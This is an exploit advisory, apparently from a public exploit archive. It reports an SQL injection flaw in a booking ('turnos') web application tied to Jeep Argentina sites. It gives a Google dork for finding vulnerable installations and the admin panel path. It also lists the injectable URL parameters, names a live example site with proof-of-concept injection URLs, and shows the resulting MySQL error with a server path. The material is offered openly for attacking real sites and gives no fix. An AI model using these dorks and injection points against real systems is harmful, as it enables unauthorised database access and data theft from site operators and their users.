################################################################################################# # Exploit Title : Sitio oficial de Jeep® Argentina Powered By Turnos SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : jeep.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''©2017 FCA US LLC. Todos los derechos reservados.Chrysler, Dodge, Jeep, Ram, Mopar y SRT son marcas registradas de FCA US LLC.'' Admin Control Panel Path => /admin/ # Exploit : /index.php?action=turnos&id_actividad=[SQL Injection] /index.php?action=turnos&id_actividad=[ID-NUMBER]&id_vehiculo=&year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&desde=[ID-NUMBER]&hasta=[SQL Injection] ################################################################################################# # Example Site => offroadparkverano.com.ar/index.php?action=turnos&id_actividad=3%27 => [ Proof of Concept ] => archive.is/c9aOS offroadparkverano.com.ar/index.php?action=turnos&id_actividad=3&id_vehiculo=&year=2019&month=02&day=20&desde=1800&hasta=2130%27 => [ Proof of Concept ] => archive.is/rAbHR # SQL Database Error => Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/adminh4/public_html/turnos.php on line 20 mysql_error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################